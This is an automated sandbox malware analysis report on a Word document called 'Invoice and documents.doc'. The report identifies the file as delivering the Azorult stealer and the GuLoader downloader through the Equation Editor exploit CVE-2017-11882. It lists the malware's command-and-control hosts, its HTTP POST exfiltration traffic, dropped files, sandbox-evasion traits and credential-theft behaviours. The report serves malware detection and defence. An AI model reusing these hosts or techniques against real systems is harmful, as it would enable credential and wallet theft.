Analysis Report Invoice and documents.doc

Overview

General Information

Sample Name: Invoice and documents.doc
Analysis ID: 287949
MD5: 007853972dfeabc5d367f853fa62a59a
SHA1: 303fb9261c4279cff64f973081d1b339c2fde73e
SHA256: d3b837c6df7e17d6f6ff9c20066fa5b0064408935d62bacdd4c9b5791002b941
Tags: doc

Detection

Azorult GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Searches for user specific document files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscry[1].exe Virustotal: Detection: 19%
Multi AV Scanner detection for submitted file
Source: Invoice and documents.doc Virustotal: Detection: 37%
Source: Invoice and documents.doc ReversingLabs: Detection: 48%

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.uttaranchaltoday.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.67.176.142:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.67.176.142:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49170 -> 103.247.10.55:80
Source: Traffic Snort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 103.247.10.55:80 -> 192.168.2.22:49170
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: officestore.co.id Content-Length: 103 Cache-Control: no-cache Data Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 3a 10 ef 26 66 9b 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 9c 47 13 8b 30 61 ec 45 70 9d 33 70 9d 35 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p:&f&f&f&f&g&fG0aEp3p5
Source: global traffic HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: officestore.co.id Content-Length: 23025 Cache-Control: no-cache
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BD6A1C03-4E04-4856-9DA8-291722E1F767}.tmp
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.uttaranchaltoday.com
Source: unknown HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: officestore.co.id Content-Length: 103 Cache-Control: no-cache Data Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 3a 10 ef 26 66 9b 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 9c 47 13 8b 30 61 ec 45 70 9d 33 70 9d 35 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p:&f&f&f&f&g&fG0aEp3p5
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://ocsp.thawte.com0
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mozglue.dll.5.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://www.mozilla.com0
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 6335590522394284581959.tmp.5.dr String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0j46j0l2j46j0j5.485j0j8&sourceid=chro
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscry[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\hfoewnmm.exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_003214B7 NtWriteVirtualMemory, 4_2_003214B7
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032021B EnumWindows,NtSetInformationThread,CloseServiceHandle,TerminateProcess, 4_2_0032021B
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00323AF0 NtResumeThread, 4_2_00323AF0
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032374C NtProtectVirtualMemory, 4_2_0032374C
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_003213B7 NtSetInformationThread,CloseServiceHandle,TerminateProcess, 4_2_003213B7
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00323C1D NtResumeThread, 4_2_00323C1D
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032151A NtWriteVirtualMemory, 4_2_0032151A
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_003235A6 NtWriteVirtualMemory, 4_2_003235A6
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_003231AA NtWriteVirtualMemory, 4_2_003231AA
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00321994 NtSetInformationThread,CloseServiceHandle,TerminateProcess, 4_2_00321994
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032027D NtSetInformationThread,CloseServiceHandle,TerminateProcess, 4_2_0032027D
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00321685 NtWriteVirtualMemory, 4_2_00321685
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00323B0C NtResumeThread, 4_2_00323B0C
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00323B5D NtResumeThread, 4_2_00323B5D
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00323BB4 NtResumeThread, 4_2_00323BB4
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_004013E4 4_2_004013E4
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00401401 4_2_00401401
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 5_3_1F2D85DF 5_3_1F2D85DF
PE file contains strange resources
Source: linkscry[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hfoewnmm.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE file does not import any functions
Source: api-ms-win-core-errorhandling-l1-1-0.dll.5.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.5.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.5.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.5.dr Static PE information: No import functions for PE file found
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@6/61@4/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$voice and documents.doc
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Mutant created: \Sessions\1\BaseNamedObjects\A8AD17B7C-343A2EC6-C0602CB5-39EA5133-2DF4BF06
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCE94.tmp
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: SELECT ALL id FROM %s;
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Invoice and documents.doc Virustotal: Detection: 37%
Source: Invoice and documents.doc ReversingLabs: Detection: 48%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130947235.000000001FCE0000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127983806.000000001F2E0000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, mozglue.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130295141.000000001FC54000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.5.dr
Source: Binary string: ucrtbase.pdb source: hfoewnmm.exe, 00000005.00000003.2131995490.000000001FD20000.00000004.00000001.sdmp, ucrtbase.dll.5.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: hfoewnmm.exe, 00000005.00000003.2128331675.000000001F330000.00000004.00000001.sdmp, freebl3.dll.5.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130225554.000000001FC48000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130881671.000000001FCC8000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2128043527.000000001F2D8000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130372042.000000001FC6C000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127631724.000000001FE34000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130881671.000000001FCC8000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.5.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, mozglue.dll.5.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130267131.000000001FC50000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127208242.000000001F2D4000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: hfoewnmm.exe, 00000005.00000003.2128331675.000000001F330000.00000004.00000001.sdmp, freebl3.dll.5.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130202575.000000001FC44000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130295141.000000001FC54000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130986178.000000001FCF0000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130881671.000000001FCC8000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr
Source: Binary string: msvcp140.i386.pdb source: hfoewnmm.exe, 00000005.00000003.2128903368.000000001E854000.00000004.00000001.sdmp, msvcp140.dll.5.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.5.dr
Source: Binary string: ucrtbase.pdbUGP source: hfoewnmm.exe, 00000005.00000003.2131995490.000000001FD20000.00000004.00000001.sdmp, ucrtbase.dll.5.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: hfoewnmm.exe, 00000005.00000003.2131902310.000000001F280000.00000004.00000001.sdmp, nssdbm3.dll.5.dr
